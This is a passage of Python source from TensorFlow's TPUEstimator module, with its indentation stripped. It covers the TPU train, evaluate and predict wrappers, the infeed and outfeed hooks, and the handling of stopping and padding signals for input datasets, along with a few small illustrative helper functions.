# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has a stronger check. The parent class's check generates a confusing warning message.
Args:
result: `features` returned by input_fn.
"""
pass
def train(self,
input_fn,
hooks=None,
steps=None,
max_steps=None,
saving_listeners=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
try:
return super(TPUEstimator, self).train(
input_fn=input_fn,
hooks=hooks,
steps=steps,
max_steps=max_steps,
saving_listeners=saving_listeners)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('training_loop', sys.exc_info())
finally:
rendezvous.record_done('training_loop')
rendezvous.raise_errors()
def evaluate(self,
input_fn,
steps=None,
hooks=None,
checkpoint_path=None,
name=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
try:
return super(TPUEstimator, self).evaluate(
input_fn,
steps=steps,
hooks=hooks,
checkpoint_path=checkpoint_path,
name=name)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('evaluation_loop', sys.exc_info())
finally:
rendezvous.record_done('evaluation_loop')
rendezvous.raise_errors()
def predict(self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error('prediction_loop', sys.exc_info())
finally:
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_savedmodel()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
if self._log_every_n_steps is not None:
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
# pylint:disable=g-long-ternary
output_dir=(self.model_dir
if not config or config.save_summary_steps
else None),
# pylint:enable=g-long-ternary
every_n_steps=self._log_every_n_steps)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info('Running %s on CPU', mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
if self._log_every_n_steps is not None:
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,))
return estimator_spec
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
tpu_init_ops = []
if ctx.embedding_config:
tpu_init_ops.extend(ctx.embedding_config.tpu_embedding.init_ops)
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops())
tpu_init_ops.extend(embedding_variables_and_ops.load_ops)
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
compile_op, loss, host_call, scaffold, training_hooks = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
host_ops = host_call.create_tpu_hostcall()
if host_ops is None:
host_ops = []
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'shutdown_worker')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(timeout_ms=60 * 1000),
]
elif shutdown_mode == 'shutdown_computation':
finalizer_hooks = [
session_support.RestartComputation(timeout_ms=60 * 1000),
]
else:
raise ValueError(
'Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' % shutdown_mode)
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks))
with ops.control_dependencies([loss]):
global_step = array_ops.identity(training.get_global_step())
hooks = input_hooks + shutdown_hooks
hooks.extend([
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops),
InstallSignalHandlerHook()
])
if self._log_every_n_steps is not None:
logging_hook_frequency = ( # Divide and round up
(self._log_every_n_steps +
self._config.tpu_config.iterations_per_loop - 1) //
self._config.tpu_config.iterations_per_loop)
hooks.append(
training.LoggingTensorHook({
'loss': array_ops.identity(loss),
'step': global_step,
},
every_n_iter=logging_hook_frequency))
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._config.tpu_config.iterations_per_loop)
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
if (self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps):
checkpoint_hook = training.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold)
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._config.tpu_config.iterations_per_loop)
chief_hooks.append(checkpoint_hook)
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops(ctx)
if ctx.embedding_config:
update_ops.extend(embedding_variables_and_ops.retrieve_ops)
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
compile_op, total_loss, host_calls, scaffold, eval_hooks = (
_eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(
total_loss,
math_ops.cast(iterations_per_loop_var, dtype=total_loss.dtype))
with ops.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops(ctx)
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
eval_metrics = host_call_ret.get('eval_metrics', {})
if eval_metrics:
# Creates a dummy metric update_op for all metrics. Estimator
# expects all metrics in `eval_metric_ops` to have an update_op and calls
# them one by one. The real metric update_ops are invoked in a
# separate thread. So, here we give Estimator the dummy op for all
# metrics.
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
for k, v in eval_metrics.items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
else:
# If no eval metrics are passed, create an identity node for the
# loss and add `internal_ops_to_run` to its dependencies. So
# `internal_ops_to_run` can be executed.
with ops.control_dependencies(internal_ops_to_run):
mean_loss = array_ops.identity(mean_loss)
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.evaluation_master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops)
] + input_hooks
if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(compile_op, dummy_predict_op, host_calls,
scaffold, prediction_hooks) = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops(ctx)
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yields the element (via a generator) to the call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoids the issue where we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions,
message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with ops.control_dependencies(host_ops):
host_ops = []  # Empty; we do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx, enqueue_ops, host_ops, rendezvous=self._rendezvous[mode],
tpu_compile_op=compile_op,
master=self._config.master,
session_config=self._session_config),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return list(export_output.outputs.values())
else:
raise ValueError(
'`export_output` must have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError('tensors must be of length 2; '
'got {}.'.format(len(tensors)))
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError('tensors must be of length 1; '
'got {}'.format(len(tensors)))
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors)))
else:
raise ValueError(
'`export_output` must have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
) = model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)
def multi_tpu_eval_steps_on_single_shard():
return training_loop.repeat(iterations_per_loop_var, single_tpu_eval_step,
[_ZERO_LOSS])
(compile_op, loss,) = tpu.split_compile_and_shard(
multi_tpu_eval_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
scaffold = _get_scaffold(captured_scaffold_fn)
return compile_op, loss, host_calls, scaffold, captured_eval_hooks.get()
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_train_step, host_call, captured_scaffold_fn,
captured_training_hooks) = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
def multi_tpu_train_steps_on_single_shard():
return training_loop.repeat(iterations_per_loop_var, single_tpu_train_step,
[_INITIAL_LOSS])
(compile_op, loss,) = tpu.split_compile_and_shard(
multi_tpu_train_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
scaffold = _get_scaffold(captured_scaffold_fn)
return compile_op, loss, host_call, scaffold, captured_training_hooks.get()
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
(single_tpu_predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks
) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)
def multi_tpu_predict_steps_on_single_shard():
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
(compile_op, dummy_predict_op,) = tpu.split_compile_and_shard(
multi_tpu_predict_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
dummy_predict_op = dummy_predict_op[0]
scaffold = _get_scaffold(captured_scaffold_fn)
return (compile_op, dummy_predict_op, host_calls, scaffold,
captured_predict_hooks.get())
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation, [constant_op.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
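# Illustrative sketch of the contract expected by the stopping-signal wrapper
# above: `op_fn` must return a dict with 'ops' (the ops to run on every
# iteration) and 'signals' (the dict produced by _StopSignals.as_dict()).
# `_example_stopping_signal_loop` and its arguments are hypothetical names
# introduced only for illustration.
def _example_stopping_signal_loop(host_device, enqueue_ops, inputs_holder):
  def op_fn():
    return {'ops': enqueue_ops, 'signals': inputs_holder.signals()}
  return _wrap_computation_in_while_loop_with_stopping_signals(
      device=host_device, op_fn=op_fn)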
def _validate_tpu_training_graph():
"""Validate graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
operations = ops.get_default_graph().get_operations()
# Check if there is at least one CrossReplicaSum operation in the graph
# This should be introduced by using the CrossShardOptimizer wrapper
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can only be captured once. Please file a bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file a bug.')
return self._object
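# Minimal usage sketch for _CapturedObject (illustrative only): capture a
# Python object inside a function that runs in a TF control-flow body and
# read it back afterwards. `_example_captured_object` is a hypothetical name.
def _example_captured_object():
  captured = _CapturedObject()
  def body():
    captured.capture('created inside the body')
    return constant_op.constant(0)
  unused_tensor = body()
  return captured.get()  # -> 'created inside the body'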
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def to_control_flow_context_def(self, context_def, export_scope=None):
# pylint: disable=useless-super-delegation
# NOTE(slebedev): the method is required by `ControlFlowContext`.
super(_CapturingContext, self).to_control_flow_context_def(
context_def, export_scope)
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'a bug.')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.DatasetV2):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer(self):
"""Returns the dataset's initializer.
The initializer must be run before calling `features_and_labels`.
"""
self._iterator = dataset_ops.make_initializable_iterator(self._dataset)
return self._iterator.initializer
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must run dataset_initializer '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self,
dataset,
batch_size,
add_padding=False,
num_invocations_per_step=1):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
if num_invocations_per_step == 1:
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
else:
# We append (2 * num_invocations_per_step - 1) batches for exhausting the
# user_provided_dataset and stop properly.
# For example, if num_invocations_per_step is 2, we append 3 additional
# padding batches: b1, b2, b3.
# If user_provided_dataset contains two batches: a1, a2
# Step 1: [a1, a2]
# Step 2: [b1, b2] -> STOP
# If user_provided_dataset contains three batches: a1, a2, a3.
# The training loops:
# Step 1: [a1, a2]
# Step 2: [a3, b1]
# Step 3: [b2, b3] -> STOP.
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = final_batch_dataset.repeat(
2 * num_invocations_per_step - 1)
def _set_mask(data_dict):
signals = data_dict['signals']
signals['padding_mask'] = array_ops.ones_like(signals['padding_mask'])
data_dict['signals'] = signals
return data_dict
# Mask out the extra batch.
final_batch_dataset = final_batch_dataset.map(_set_mask)
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is now a dictionary with `features`, `labels`, and `signals` as three
distinct keys. This provides a better structure, which eases the process of
decomposing the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# when the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(features, labels,
batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size,
padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
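# Usage sketch (illustrative only): this is roughly how the map_fn returned by
# `insert_stopping_signal` is applied to a batched dataset so that every batch
# carries `features`, optional `labels`, and `signals` keys.
def _example_insert_stopping_signal(dataset, batch_size):
  return dataset.map(
      _InputsWithStoppingSignals.insert_stopping_signal(
          stop=False, batch_size=batch_size, add_padding=True))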
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
"""Detects whether scalar_stopping_signal indicates stopping."""
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return math_ops.logical_and(scalar_stopping_signal,
_StopSignals.STOPPING_SIGNAL)
else:
# For the non-Tensor case, it is used in SessionRunHook, so we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
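# Illustrative sketch of the signals produced above: for a batch of two
# examples, `as_dict()` yields a [2, 1] bool 'stopping' tensor, the scalar
# form is its first element, and `should_stop` accepts both Tensors and
# plain Python bools. `_example_stop_signals` is a hypothetical name.
def _example_stop_signals():
  signals = _StopSignals(stop=True, batch_size=2).as_dict()
  scalar = _StopSignals.as_scalar_stopping_signal(signals)
  return _StopSignals.should_stop(scalar)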
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor,
real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(real_batch_size, missing_count,
batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
# order is preserved. By that, the sliced padding mask should have all 0's.
# If this assertion fails, the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [
x for x in nest.flatten(batch_features) if isinstance(x, ops.Tensor)
]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = array_ops.concat([
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
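# Illustrative padding sketch (hypothetical shapes): a partial final batch of
# three examples is padded up to batch_size=4, and the returned mask marks the
# single padded row with a one, so it can be sliced away again by
# `slice_tensor_or_dict` after the TPU computation.
def _example_pad_partial_batch():
  features = {'x': array_ops.ones((3, 5), dtype=dtypes.float32)}
  labels = array_ops.zeros((3,), dtype=dtypes.int32)
  padding_mask, features, labels = _PaddingSignals.pad_features_and_labels(
      features, labels, batch_size=4)
  return padding_mask, features, labels  # padding_mask -> [0, 0, 0, 1]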
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
